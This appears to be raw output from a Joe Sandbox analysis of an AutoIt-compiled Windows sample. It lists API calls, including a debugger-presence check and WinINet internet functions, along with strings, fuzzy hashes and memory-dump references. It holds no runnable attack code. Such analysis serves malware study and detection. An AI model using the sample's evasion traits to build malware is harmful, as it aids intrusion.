                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                        • Opcode ID: 981160d69b0eb8c3732cdceb032e65809b993585d4ba0838080ca05b21b62fe0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7f64104b954e96d3f60a8ce6c343225c2a6155ff2dfad7ff62099143f71ecfd1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 981160d69b0eb8c3732cdceb032e65809b993585d4ba0838080ca05b21b62fe0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16513871E1864186C7217715CD0136A3BA1AB50BA0F284D5AF0D94A3EDEE3ECC97BB46
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: #
                                                                                                                                                                                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                        • Opcode ID: 77037f6985628cde5d0e880773746787b8de6bad39e7768185d775ff1435674a
                                                                                                                                                                                                                                                                                                        • Instruction ID: dcb56e7fccd6e4ab9eba9c44cf48ad1f978c4e24a9944553e10098dbc1b72a62
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77037f6985628cde5d0e880773746787b8de6bad39e7768185d775ff1435674a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8251293190424ADFEB26DF28C482BFA7BA0BF05314F15805EE9D19B2C1DB38A942DB51
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00FCF6DB
                                                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FCF6F4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: e40fc59cdd0cfdc33501cf9e35e52b38384a5c8dbd2683368a8acfc3d6e2a153
                                                                                                                                                                                                                                                                                                        • Instruction ID: 31088bdfd1165a7650d9f5ff82cd20bd682d790c5e66df3de3406193a8fdb04e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e40fc59cdd0cfdc33501cf9e35e52b38384a5c8dbd2683368a8acfc3d6e2a153
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB516AB1918748ABD320AF11DC86BAFBBECFF94300F81484DF1D951195DB398529CB26
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                                        • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                                        • Opcode ID: 51579671108156163bc76f21e41e285525867c744b46ddf8be5c524e24b48698
                                                                                                                                                                                                                                                                                                        • Instruction ID: fb13d382fb0c72a3bb20e09a5c8e2c5f75fd5494883fea36f30af9d025a8f862
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51579671108156163bc76f21e41e285525867c744b46ddf8be5c524e24b48698
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2041E271E00609AFCB04DFA9C8819FEBBF9FF88320F114069F455A7252D7769A81CB90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0102DB75
                                                                                                                                                                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0102DB7F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: |
                                                                                                                                                                                                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                        • Opcode ID: d892a82567763bda09d73f9d8ddb0e9b9ec2168738d0750716e1a2dbe30d8365
                                                                                                                                                                                                                                                                                                        • Instruction ID: cd4a194600a875ca6139bdf53e97edf584401336f52be57e796501a53cf4ae1b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d892a82567763bda09d73f9d8ddb0e9b9ec2168738d0750716e1a2dbe30d8365
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A731AD71801119ABCF41DFA5CC94AEEBFB9FF04340F100069F905A7262EB759A02DF50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 010440BD
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 010440F8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                        • Opcode ID: 433f3de62f1703c8655f668efaaeec0b15c67d55d529f7d2ee6b4c486e2abf64
                                                                                                                                                                                                                                                                                                        • Instruction ID: 20eea7ba30ca09a954822dc29539f1fbc0c0ffe751afdc00e6db4513c082d961
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 433f3de62f1703c8655f668efaaeec0b15c67d55d529f7d2ee6b4c486e2abf64
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09317EB1510604ABDB25DF68CC80FFB77A9FF48724F008629F9A5C7181DA75E891DB60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 010450BD
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010450D2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID: '
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                        • Opcode ID: f32188e4325382792bd43225ced7b3e3ecbfee87ce36a59613c9bdfeaca466f4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7065958a5eb770c9e3fefc3dd4da8e12a90969e71127f07330ff3cec783ac1a6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f32188e4325382792bd43225ced7b3e3ecbfee87ce36a59613c9bdfeaca466f4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E131E7B8A0120A9FDB54CF69C981BDE7BF5BF49300F104069EA44AB356D771A945CF90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB78B1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: GetStockObject.GDI32(00000011), ref: 00FB78C5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB78CF
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 01044216
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 01044230
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3c07c57b3cf82dd4343500e871c3e0c1c7c0fdff9904d2e5b7fc6668c31a1770
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1f6dcbe64821bdb0ee922c1998a8dbb3b9cc12a5573d3bd5f79b2cb8744e186c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c07c57b3cf82dd4343500e871c3e0c1c7c0fdff9904d2e5b7fc6668c31a1770
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A1126B261020AAFDB11DFA8C985AEE7BF8EB08314F014924F995E3240D675E8509B60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0102D7C2
                                                                                                                                                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0102D7EB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                        • String ID: <local>
                                                                                                                                                                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9877911e1ebd986fa2c6ee87584451a9dfc0c5d05d312dd1588c6a472877f2bc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2b71529799f7ca2dbf0e00b6b66760c38d6f58fdb79805b03ab80954fcae88cc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9877911e1ebd986fa2c6ee87584451a9dfc0c5d05d312dd1588c6a472877f2bc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA1106B11012727AD7344BA68C89EE7BE9DFB126A4F00422AF58982080E2688C40C7F0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 0101761D
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01017629
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                        • String ID: STOP
                                                                                                                                                                                                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                        • Opcode ID: 39347d4eae55123c9581e159b149c0386d36e41ac4977eb5ffe6b9fa63dceda1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 368fe63de0241149f96f6b028c6e4b81f0698f98ef3901bb22069f56bb2cc071
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39347d4eae55123c9581e159b149c0386d36e41ac4977eb5ffe6b9fa63dceda1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E01C032A1012B8BDB21AEBECC909BF77F5BB586947400964F4A593299EB39D9009690
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01012699
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5e3f4613e95f8db6d7dbf10cfc7900a6acd0aedd8fca4d1179a337008337131c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 78319fd09cba57154eff39cd3b9065ed90fe4dfa4774c68c8197166c29a195d1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e3f4613e95f8db6d7dbf10cfc7900a6acd0aedd8fca4d1179a337008337131c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0901D475A00219ABDB04EBA4CC51CFE77A8EF5A350B140A19A8B2A72D9DB79540DCB50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 01012593
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3c1d231b9342e4570d1a2d0842eca951533cb67ea8f71064a94c11479ec8a39a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 017b9cdbe2de70d5757f73ffdbc5b91af7deaf5ad2e82813c040bc62b4c17fc4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c1d231b9342e4570d1a2d0842eca951533cb67ea8f71064a94c11479ec8a39a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11017B75B000096BDB04E790CCA2DFF37E8DF56340F1000196883A3285DB6D8A0CC7B1
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 01012615
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1291d2f20e828b12749d641f4211597dfd3e0ddae089afe4533cf6e58fd36bd0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4f55d1911b4cf821e70953b375c66daa9640816511bdb997aeeda24575e0401b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1291d2f20e828b12749d641f4211597dfd3e0ddae089afe4533cf6e58fd36bd0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF012675A00109A6DB05E7A5CD51EFF77E89F19340F140029B883A3285DB6D8A0CD6B1
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 01012720
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: c0f09eafae94de6fc83c03965a172bba79526c490f130afafd4101be5f3d5c81
                                                                                                                                                                                                                                                                                                        • Instruction ID: d5afec818cbcc3941490b00522145b122b449b634dd4ae3d21b27785d5517164
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0f09eafae94de6fc83c03965a172bba79526c490f130afafd4101be5f3d5c81
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25F0FF75A40219AADB04F3A8CC51FFF77A8AF16340F440919B4A2A32C5EBAD580C8660
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0101146F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2ff649a0f95ad9fb1fbe62c8648728d367025b642511529308ad2e1a6f1eaf96
                                                                                                                                                                                                                                                                                                        • Instruction ID: b34a90073d5de804ad7f01d96e8e84e78aaacae8851c928c8787d93c935e3b7e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ff649a0f95ad9fb1fbe62c8648728d367025b642511529308ad2e1a6f1eaf96
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0E0927138471837D2243794BC43F887A8A8F08B51F15482AB7C8995C28EE724505399
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FD10E2,?,?,?,00FB100A), ref: 00FCFAD9
                                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00FB100A), ref: 00FD10E6
                                                                                                                                                                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FB100A), ref: 00FD10F5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FD10F0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                        • Opcode ID: f258fc0d154476ebe4fe91f750d76a841f4a2e5890388dc6d944ad5692fd49f1
                                                                                                                                                                                                                                                                                                        • Instruction ID: e8062990ee76f7716266503185d354cc1983bfdc972dac3b549b4a085f32035e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f258fc0d154476ebe4fe91f750d76a841f4a2e5890388dc6d944ad5692fd49f1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE06D746043118BD370AF65D659747BBE9BB10311F04891DE8C6C2345EBB9D444EB91
                                                                                                                                                                                                                                                                                                        APIs
